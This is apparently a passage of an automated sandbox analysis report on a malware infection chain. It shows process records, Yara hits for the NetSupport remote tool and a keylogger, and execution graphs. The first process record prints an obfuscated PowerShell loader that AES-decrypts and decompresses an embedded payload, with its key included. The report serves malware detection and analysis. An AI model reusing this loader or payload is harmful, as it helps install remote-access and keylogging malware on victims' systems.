                                                                                                                      Commandline:powershell.exe $cwWl = 'AAAAAAAAAAAAAAAAAAAAACgw0kTXfDt7VyGQWkvUWZWoRWwQ3foR84LKr0hIDBn55hU2P/QaH7UkicLpJA/xSJe84nJJo6jId61fi3om68eOCGqV7+xcDPABW0JXS0BNLSJCDSQlWtLiZ1E8R3S8ajj1PUmqy7WW9uT2VoNU9+010dg1zxZzgrNA/hcsUz5YVLblgbKewS5UQz7KSXbyb+CIClfTCOKLkZz7/MgCao3wN7ZeZ9Gb0u7SLIy7/xgnQsB0l3y8s69ruJDDmpYRh/RzGp2gf/qgjHb69/JjuK79SBgoIiM5oVSJ9CpWdthdRf2P9XkKGkXCBzJk9SV8CqUOLVMO0s3WHoiyqMsy+pqxJ4e/1jontj7rpiNv74j3Axt+r8La7T/hMWUnuxUgJbbnYl3FdW8s+G5JNU2lt2QBmjnyCxdZEhHS37qR0lcaXLNh7PQHbDGNYuMxnA6GJlxD0f87eY0FNf6zB/eR50WXPe/DXv/2VOm4h7EONAY3PyeLB6cFgk5v+vcMZz1G3FHk+oD59x4TIQ/jSbjrv1tBgAK4PwwUkiat07QTB8NB6LWM7kzWo7HjPZyGY+DvUE1B5PoEFLx54pWq3feDtfCTSpTbRyLKDvK0nXyFp/G/PV523VBKf67xcBp4jYYN0tRKraOrZoUhErSuWwHHbgshkWMXIc+l1PJDcozYEeFSzmwlBM2jFbwg0yMOkBZG4tcB0WxvMT2cmatL9Cem3kfSU75JXtNn4spkMmxgPemj2lDy7zR1O9HP6kBKK+BjI3gFMb9Ry8Y1XwIVbuRW2UYypeCbXN38X9tvobSoJuBZQSe9Wj2TyHbRMHmbRLqU/tOvc/zQFUwqWAJ35WKeKei0PA4ioeHdhfZUxES8DjE0qSOJ3xNCxb/CQtf5HWEiLOpuXHlrHfEvyvBv0bYdrLzqZGBt9Wnyyl/ULpYqA5jNbUblmlaCeQgfQqpN9JaEIILd/WRa2PZ15h459LGu0en5qVzPNFtLZA+WkpfbXVyyXlcop8wApuAZTYj70NHYqkevtwO9/5jrAew4VqzCHOg2AAORrYEcnIOYJ+VnQVArdafr/6JOJiUGDfpzqL8agehMghJttIKhbaTtw3JXM42ZXYlE11kZt5PK56YJ3z/5o6URS7i1TdNR5oycuY5kMyjfU4f53FC65Md/65hgrRKTGDjWaUCKRazVMpLHSrOMk4x6nKQCn/LspzRVHtBWxfpvfq8kSxAP1WfuQDn8GZ0z4sbAPyZDZPtsS35qdlMo7wjJPr5H/lrd0Em7GMqWijrCpuf5OnwZEHFaM9MaFLOUAynybcJEor/t4xmDSIhKEzXjSR6X6wRkzE3Ph08iwneJLkiTHUjABGexMKq8XZtQJNPi3oecXcDMsJl9hR3dnSX8d2uijZ15EyeLG8esgN9njz3GNN6i6AOa8nXIKVLOTJ5fW1Lq6sI93oVUmTWNrqlO++5wKQe7PyfDzXcbF7x5vIGs0+MvugezqSEJInVTYjx6gcEKW6bnJq0n5pZU62ZO37pXLEodb7pM4qJ+5gTI1GMy0n94xqmVlTWhenE=';$osjnGw = 'RVJyQ3FGSFZXTUVhcnp3S2ZYcFp2VHh0RXFUdmJYWHU=';$HYoyNbe = New-Object 'System.Security.Cryptography.AesManaged';$HYoyNbe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HYoyNbe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HYoyNbe.BlockSize = 128;$HYoyNbe.KeySize = 256;$HYoyNbe.Key = [System.Convert]::FromBase64String($osjnGw);$MojFO = [System.Convert]::FromBase64String($cwWl);$QfSOiZVu = $MojFO[0..15];$HYoyNbe.IV = $QfSOiZVu;$vcdTgJDLO = $HYoyNbe.CreateDecryptor();$kQWgqYwUt = $vcdTgJDLO.TransformFinalBlock($MojFO, 16, $MojFO.Length - 16);$HYoyNbe.Dispose();$EnAuWBr = New-Object System.IO.MemoryStream( , $kQWgqYwUt );$sQFTam = New-Object System.IO.MemoryStream;$sHlBzafiX = New-Object System.IO.Compression.GzipStream $EnAuWBr, ([IO.Compression.CompressionMode]::Decompress);$sHlBzafiX.CopyTo( $sQFTam );$sHlBzafiX.Close();$EnAuWBr.Close();[byte[]] $DNZNxE = $sQFTam.ToArray();$xZHVto = [System.Text.Encoding]::UTF8.GetString($DNZNxE);$xZHVto
                                                                                                                      Imagebase:0x110000
                                                                                                                      File size:430'592 bytes
                                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:7
                                                                                                                      Start time:18:19:11
                                                                                                                      Start date:07/09/2023
                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:powershell -
                                                                                                                      Imagebase:0x110000
                                                                                                                      File size:430'592 bytes
                                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                      Has exited:true

                                                                                                                      Target ID:21
                                                                                                                      Start time:18:19:37
                                                                                                                      Start date:07/09/2023
                                                                                                                      Path:C:\Users\user\AppData\Roaming\MediaContent\client32.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\MediaContent\client32.exe"
                                                                                                                      Imagebase:0x1230000
                                                                                                                      File size:105'848 bytes
                                                                                                                      MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000015.00000002.519267559.0000000011193000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000002.519267559.0000000011193000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000000.320629163.0000000001232000.00000002.00000001.01000000.00000012.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000003.325062224.0000000003C05000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000002.519343062.00000000111E1000.00000004.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000002.517350632.0000000002D95000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000002.517107159.0000000001232000.00000002.00000001.01000000.00000012.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000003.325155837.0000000003C0A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000002.520439139.000000006F1C0000.00000002.00000001.01000000.00000017.sdmp, Author: Joe Security
                                                                                                                      Has exited:false

                                                                                                                      Target ID:22
                                                                                                                      Start time:18:19:39
                                                                                                                      Start date:07/09/2023
                                                                                                                      Path:C:\Users\user\AppData\Roaming\MediaContent\client32.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\MediaContent\client32.exe
                                                                                                                      Imagebase:0x1230000
                                                                                                                      File size:105'848 bytes
                                                                                                                      MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000016.00000000.323306200.0000000001232000.00000002.00000001.01000000.00000012.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000016.00000002.325285064.0000000001232000.00000002.00000001.01000000.00000012.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000016.00000002.325490052.00000000111E1000.00000004.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000016.00000002.325451942.0000000011193000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000016.00000002.325451942.0000000011193000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                      Has exited:true

                                                                                                                      Reset < >

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:14.5%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:6.4%
                                                                                                                        Total number of Nodes:47
                                                                                                                        Total number of Limit Nodes:3
                                                                                                                        execution_graph 13539 6d66340 13540 6d66353 13539->13540 13543 6d663b8 13540->13543 13541 6d66397 13544 6d663db 13543->13544 13545 6d6641b 13544->13545 13547 6d665a0 13544->13547 13548 6d665b4 13547->13548 13551 6d66838 13548->13551 13553 6d66851 13551->13553 13552 6d668ba 13553->13552 13556 6d66f78 13553->13556 13554 6d665e1 13554->13545 13558 6d66f9e 13556->13558 13559 6d670a8 13556->13559 13558->13559 13560 6d66a24 13558->13560 13559->13554 13561 6d67258 CreateNamedPipeW 13560->13561 13563 6d6738a 13561->13563 13498 2881760 13499 2881772 13498->13499 13502 2883d48 13499->13502 13500 28817a2 13503 2883d62 13502->13503 13504 2883d87 13503->13504 13507 2883e10 13503->13507 13511 2883e01 13503->13511 13504->13500 13508 2883e23 13507->13508 13515 2883e78 13508->13515 13512 2883e23 13511->13512 13514 2883e78 GetFileAttributesW 13512->13514 13513 2883e41 13513->13504 13514->13513 13516 2883e9d 13515->13516 13518 2883e41 13516->13518 13521 2884418 13516->13521 13518->13504 13519 2884418 GetFileAttributesW 13519->13518 13525 2884910 13521->13525 13530 2884920 13521->13530 13522 2883f63 13522->13518 13522->13519 13526 2884938 13525->13526 13527 288494d 13526->13527 13535 2884494 13526->13535 13527->13522 13531 2884938 13530->13531 13532 288494d 13531->13532 13533 2884494 GetFileAttributesW 13531->13533 13532->13522 13534 288497e 13533->13534 13534->13522 13536 2885100 GetFileAttributesW 13535->13536 13538 288497e 13536->13538 13538->13522

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 0 288dacd-288dad0 1 288da59 0->1 2 288dad2-288fcfa call 2886988 0->2 3 288da5b-288da60 1->3 4 288da30 1->4 550 288fd04-288fd15 2->550 3->0 552 288fd1b-288fd6d 550->552
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.264398504.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_2880000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: fOq$~Lbq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq
                                                                                                                        • API String ID: 0-1595061457
                                                                                                                        • Opcode ID: e8ed1816b7773f10f579449f7b75821ebf3cae1a5843ef9e4f8311bf40d39b60
                                                                                                                        • Instruction ID: adbc596215788b0bf7a441f0c17ee837aa2fb67deadf9c038dd212a40449d4ab
                                                                                                                        • Opcode Fuzzy Hash: e8ed1816b7773f10f579449f7b75821ebf3cae1a5843ef9e4f8311bf40d39b60
                                                                                                                        • Instruction Fuzzy Hash: 98035D709011199FDB15DB68CC54BAE7BBBBF85308F1941E9E109AB390DE316E84CF92
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 558 288daf0-288fd15 call 2886988 1106 288fd1b-288fd6d 558->1106
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.264398504.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_2880000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: fOq$~Lbq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq$cJq
                                                                                                                        • API String ID: 0-1595061457
                                                                                                                        • Opcode ID: 409c549af809803e34fb4581440f4b82e4575bd24c37b279bb73c2f8a975e1ff
                                                                                                                        • Instruction ID: b7bd1c7202e0689cc71b781995da7157d79336763b1ae7a891c40ab253d9ea59
                                                                                                                        • Opcode Fuzzy Hash: 409c549af809803e34fb4581440f4b82e4575bd24c37b279bb73c2f8a975e1ff
                                                                                                                        • Instruction Fuzzy Hash: 75035D70A011199FDB15DB68CC54BAE7BBBBF85308F1941E9E1096B390DE316E84CF92
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1836 6d66a24-6d672c2 1839 6d672c4-6d672ca 1836->1839 1840 6d672cd-6d672d6 1836->1840 1839->1840 1841 6d672f5-6d672f9 1840->1841 1842 6d672d8-6d672f4 1840->1842 1843 6d6731a-6d67388 CreateNamedPipeW 1841->1843 1844 6d672fb-6d67312 1841->1844 1842->1841 1846 6d67391-6d673cf 1843->1846 1847 6d6738a-6d67390 1843->1847 1844->1843 1851 6d673e4-6d673e8 1846->1851 1852 6d673d1-6d673d5 1846->1852 1847->1846 1854 6d673ea-6d673f6 1851->1854 1855 6d673f9 1851->1855 1852->1851 1853 6d673d7-6d673da 1852->1853 1853->1851 1854->1855
                                                                                                                        APIs
                                                                                                                        • CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 06D67378
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.271930514.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_6d60000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateNamedPipe
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2489174969-0
                                                                                                                        • Opcode ID: c900b24210dc93ceda768d4660d9f4b5b2448ee2e0005af2c39884d2a8871edb
                                                                                                                        • Instruction ID: 6a62986937cc0d2fa5f04b999dabee5363e7290e1df2ecc8da6b5b6d6fa7a18b
                                                                                                                        • Opcode Fuzzy Hash: c900b24210dc93ceda768d4660d9f4b5b2448ee2e0005af2c39884d2a8871edb
                                                                                                                        • Instruction Fuzzy Hash: 2451F5B1D00308DFDB54CFAAC88479DFBF6AF48314F24802AE918AB260D7759944CF51
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.271930514.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_6d60000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f2316ce4b73fe771fa07f0afa43a371d9c85f9cb9acf7d10195232ec95daa17e
                                                                                                                        • Instruction ID: bed85dfbe7a09070349cdeb8f752b2f7a995c99a14c864fff34e5b49554bb034
                                                                                                                        • Opcode Fuzzy Hash: f2316ce4b73fe771fa07f0afa43a371d9c85f9cb9acf7d10195232ec95daa17e
                                                                                                                        • Instruction Fuzzy Hash: F9429130A002159FEB159B64C850BADB7B2EF88304F14C5EAE9097B395DF71AD91CFA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1857 28851a8-28851c1 1861 28851c3-28851c4 1857->1861 1862 28851c7-28851cb 1857->1862 1863 28851cc-28851ce 1861->1863 1864 28851c6 1861->1864 1864->1862
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.264398504.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_2880000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cf3167912d22cdb15d3a6a378b2ac7f8be306d2d75bda46e8988ba0b857a8658
                                                                                                                        • Instruction ID: a9cc3b64ffbd5a8ded38ffef102e4ad9174479905395121b4ea19835dd82c903
                                                                                                                        • Opcode Fuzzy Hash: cf3167912d22cdb15d3a6a378b2ac7f8be306d2d75bda46e8988ba0b857a8658
                                                                                                                        • Instruction Fuzzy Hash: 8A2157BED043889FCB11DB78DC546EABFB0EF06358F0A4185D058D7252D7385805CB92
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1865 28850f9-288514a 1867 288514c-288514f 1865->1867 1868 2885152-288517d GetFileAttributesW 1865->1868 1867->1868 1869 288517f-2885185 1868->1869 1870 2885186-28851a3 1868->1870 1869->1870
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(00000000), ref: 02885170
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.264398504.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_2880000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: aeace8f4f983c8ecc12cea18f7b726446823bd4debb03513e4f0d9f843e325ec
                                                                                                                        • Instruction ID: 5a37674667322e917e9b6cbcc7bb97edba760a9580d24c08ed4188268886e9f3
                                                                                                                        • Opcode Fuzzy Hash: aeace8f4f983c8ecc12cea18f7b726446823bd4debb03513e4f0d9f843e325ec
                                                                                                                        • Instruction Fuzzy Hash: 132144B5D006199FCB10DFAAD84469EFBB4FB48324F15811AD818A7240D738A944CFA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1873 2884494-288514a 1876 288514c-288514f 1873->1876 1877 2885152-288517d GetFileAttributesW 1873->1877 1876->1877 1878 288517f-2885185 1877->1878 1879 2885186-28851a3 1877->1879 1878->1879
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(00000000), ref: 02885170
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.264398504.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_2880000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: cb9068fa081c9b5b4019df1ca4c256d1f71c72c4366368247a1c4ee07f3c87a5
                                                                                                                        • Instruction ID: ee361ed23b360a1b573db94afbe4442b2217784727c0ee3213aae386267b38d8
                                                                                                                        • Opcode Fuzzy Hash: cb9068fa081c9b5b4019df1ca4c256d1f71c72c4366368247a1c4ee07f3c87a5
                                                                                                                        • Instruction Fuzzy Hash: F92136B9D006199BCB10DFAAD9446AEFBB4FB48324F55812AD818B7310D378A944CFA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.264333946.00000000027CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027CD000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_27cd000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 298f809f78d61f04d43f92ef6cc8276cfcb273ab5110afeb6eadd1c7a5f2ec65
                                                                                                                        • Instruction ID: 7e398438b165bcec78462946fe195a9f7c90626dded517d1f6a3338b54492bee
                                                                                                                        • Opcode Fuzzy Hash: 298f809f78d61f04d43f92ef6cc8276cfcb273ab5110afeb6eadd1c7a5f2ec65
                                                                                                                        • Instruction Fuzzy Hash: 44018431504344AED7208E3DDC84B66BF98EF41778F28846EED455B282C7799485C6B2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.264333946.00000000027CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027CD000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_27cd000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b220b1658b52fd52ba85c38e28fe6b0f0096173a242977952a259abc8b4ae518
                                                                                                                        • Instruction ID: e64fc1dd0fcf582657ebc5f67026a379c8045b04ce2d962cc7853aacb3256549
                                                                                                                        • Opcode Fuzzy Hash: b220b1658b52fd52ba85c38e28fe6b0f0096173a242977952a259abc8b4ae518
                                                                                                                        • Instruction Fuzzy Hash: 4801E96140D3C49ED7128B398C94B66BFB4EF43624F1D81DBE9888F2A3C2695849D772
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.264398504.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_2880000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: (_Jq$(Nq$4cJq$`QJq$tPJq$$Jq$cJq
                                                                                                                        • API String ID: 0-3104996636
                                                                                                                        • Opcode ID: f39040800a5efd29fc5d1eb7ce4c6357255d533b2a75aa1324693d3e3c246df4
                                                                                                                        • Instruction ID: 3584add3e46d4d541f65345f5db1f5064178913af86a0704f6209f1e0b4d5633
                                                                                                                        • Opcode Fuzzy Hash: f39040800a5efd29fc5d1eb7ce4c6357255d533b2a75aa1324693d3e3c246df4
                                                                                                                        • Instruction Fuzzy Hash: BAA26230B001145FEB189B79DC14BBE3EA3EBC4B04F29C0A999069B3C5DE726D519BD6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.264398504.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_2880000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: (_Jq$(Nq$4cJq$`QJq$tPJq$$Jq$cJq
                                                                                                                        • API String ID: 0-3104996636
                                                                                                                        • Opcode ID: 74b873cb134f02fd3a8de2fda02e010d8c1b0dca1e7a3ded62f778833932627e
                                                                                                                        • Instruction ID: 925ffcf40b5a391808fdcb35dcd91e78143e65e48d337fb9a882e4083a284c73
                                                                                                                        • Opcode Fuzzy Hash: 74b873cb134f02fd3a8de2fda02e010d8c1b0dca1e7a3ded62f778833932627e
                                                                                                                        • Instruction Fuzzy Hash: 34A26130B001145FEB589B79DC10BBE3EA3EBC4B04F29C0A9990A5B3C5DE726D519BD6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.264398504.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_2880000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: fOq$ fOq
                                                                                                                        • API String ID: 0-2290837453
                                                                                                                        • Opcode ID: 3e950fff0f0bb3e00d21a4d77865755d4b1eb770ecd9ba4e541a3cf62f0ad633
                                                                                                                        • Instruction ID: 472f060137a614229d24059f924a8b2c1414c6016691ff4d9f355badaff999cb
                                                                                                                        • Opcode Fuzzy Hash: 3e950fff0f0bb3e00d21a4d77865755d4b1eb770ecd9ba4e541a3cf62f0ad633
                                                                                                                        • Instruction Fuzzy Hash: 4B031A34A002189FEB15DB64E858BAD7BB3FF89304F2484E8E5096B794DE356E81CF51
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.264398504.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_2880000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: fOq$ fOq
                                                                                                                        • API String ID: 0-2290837453
                                                                                                                        • Opcode ID: 84f8a87d4225d2c2a90f76054a183e0939f1fdd7c89a555eb3a09772e5fc382f
                                                                                                                        • Instruction ID: b67292813cb0552c59381ea536fe5d44e5a6b60c24b03689dede8837f1a8a9fc
                                                                                                                        • Opcode Fuzzy Hash: 84f8a87d4225d2c2a90f76054a183e0939f1fdd7c89a555eb3a09772e5fc382f
                                                                                                                        • Instruction Fuzzy Hash: 8A031934A002188FEB15DB64E858BAD7BB3FF89304F2484E8E5096B794DE356E81CF51
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.264398504.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_2880000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: fOq$ fOq
                                                                                                                        • API String ID: 0-2290837453
                                                                                                                        • Opcode ID: 94d7b8cdae48f7736ef2e85ba18f1569291bc0879e2193e31bb998afe97adb0c
                                                                                                                        • Instruction ID: ca8ed9fd2d60bc45485b07fc5bf8208803b5a29bff389f1956830d130036c64d
                                                                                                                        • Opcode Fuzzy Hash: 94d7b8cdae48f7736ef2e85ba18f1569291bc0879e2193e31bb998afe97adb0c
                                                                                                                        • Instruction Fuzzy Hash: 90E22A34A012189FEB15EB64E858BAD7BB3FF89304F1480E8E5096B794DE356E81CF51
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.264398504.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_2880000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2be1a3571781b0e7b1932bfafb4211de7d2a2f17dd0aa0777f73465a8d7740d7
                                                                                                                        • Instruction ID: 88a24fca6c3666193257ade908820fd0722b62e6b0a7a74cf5ff0084eaecc588
                                                                                                                        • Opcode Fuzzy Hash: 2be1a3571781b0e7b1932bfafb4211de7d2a2f17dd0aa0777f73465a8d7740d7
                                                                                                                        • Instruction Fuzzy Hash: 6C81B502458998DAF75519BB49317C63B98CB07AACF704FC8CBACC81E7F59AC19BC215
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:9.5%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:0%
                                                                                                                        Total number of Nodes:36
                                                                                                                        Total number of Limit Nodes:1
